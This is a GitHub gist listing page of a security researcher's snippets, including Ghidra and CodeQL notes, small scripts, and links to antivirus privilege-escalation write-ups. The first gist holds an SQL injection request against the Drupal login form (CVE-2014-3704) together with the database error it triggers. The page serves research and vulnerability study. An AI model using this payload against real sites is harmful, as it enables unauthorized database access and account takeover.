Skip to content

Instantly share code, notes, and snippets.

@v-p-b
v-p-b / gist:f76e7cd7b39f062606a6
Created October 16, 2014 09:01
CVE-2014-3704
name[0%20%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test&form_build_id=form-sn1hRoa-B1e-GhbPCBRswqRllD0noOdRnJE5iiO53pI&form_id=user_login_block&op=Log+in
<li><em class="placeholder">PDOException</em>: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;oxr 1=1 -- , &#039;admin&#039; AND status = 1&#039; at line 1: SELECT * FROM {users} WHERE name = :name_0 oxr 1=1 -- , :name_0 AND status = 1; Array
(
[:name_0 oxr 1=1 -- ] =&gt; admin
[:name_0] =&gt; admin
)
@v-p-b
v-p-b / todo.sh
Created December 2, 2013 12:26
my supy-dupy todo script
#!/bin/bash
if [ $1 ]; then
if [[ $2 && $2 == "done" ]]; then
rm ~/_todo/$1;
else
touch ~/_todo/$1;
fi;
fi;

Keybase proof

I hereby claim:

  • I am v-p-b on github.
  • I am buherator (https://keybase.io/buherator) on keybase.
  • I have a public key whose fingerprint is 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855

To claim this, I am signing this object:

@v-p-b
v-p-b / pydbg-install-tips
Created June 13, 2011 14:55
PyDbg install tips
http://code.google.com/p/paimei/ - As of r253
- You need pydasm, it is included in the libdasm package. v1.5 is fine, you don't want to fight with the bugs of the unstable version - http://code.google.com/p/libdasm/
- PyDasm will cry about MSVC scripts but you don't need those. Install MinGW (with C++ support?) - http://www.mingw.org/
- Add MinGw's bin directory to your path or else it won't find gcc
- Remove the -mno-cygwin parameters from pythonXX\lib\distutils\cygwinccompiler.py, remove the .pyc to recompile
- setup.py build_ext --compiler=mingw32
- setup.py install may fail. Install the lib by copying the .pyd file from the build directory to PythonXX\Lib\site-packages
- You don't need PaiMei's dependencies to use PyDbg, just simply build and install with setup.py
- Remove the bundled pydasm.pyd from the PaiMei package
@v-p-b
v-p-b / Skeptics_Guide_to_Security_Cons.md
Last active January 23, 2020 13:43
Skeptics Guide to Security Conferences

My current target uses a deterministic pattern when calling C++ constructors, so I can use the CFG to identify object instantiation. Here are my notes about how to use Ghidra's decompiler to get the sizes of objects to be created:

We can use the parameter of operator_new() to find the size of the objects. Instead of parsing the instructions of the relevant basic blocks (and hoping that we don't run into some unexpected instruction sequences generated by the compiler) we can use the decompiler to get the association between the call to operator_new() and its parameter.

Ghidra/Features/Decompiler/ghidra_scripts/ShowCCallsScript.java contains a nice example of how to use the Decompiler API. First, an instance of DecompInterface must be created, as shown in setUpDecompiler(). Note that this method doesn't call openProgram() on the returned DecomInterface object, that is necessary to run decompilation! The decompileFunction() method works as expected - the returned DecompileResults object con

@v-p-b
v-p-b / CodeQL_Workspace_without_starter.md
Last active July 25, 2020 20:26
Setting up a CodeQL workspace without the starter repository
@v-p-b
v-p-b / call_tree_strings.py
Created October 4, 2020 18:49
Stupid little Ghidra script to find identifiable strings referenced from a function or its descendants
#Stupid little script to find identifiable strings referenced from a function or its descendants
#@author buherator
#@category Test
#@keybinding
#@menupath
#@toolbar
from ghidra.util.task import TaskMonitor
from docking.widgets import OptionDialog
from ghidra.program.model.symbol import RefType
@v-p-b
v-p-b / debugger-lighthouse.py
Last active October 14, 2020 08:23
From debugger to Lighthouse
import sys
import struct
"""
From debugger trace to Lighthouse
=================================
Converting debugger trace logs to binary drcov format that is good enough for Lighthouse.
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html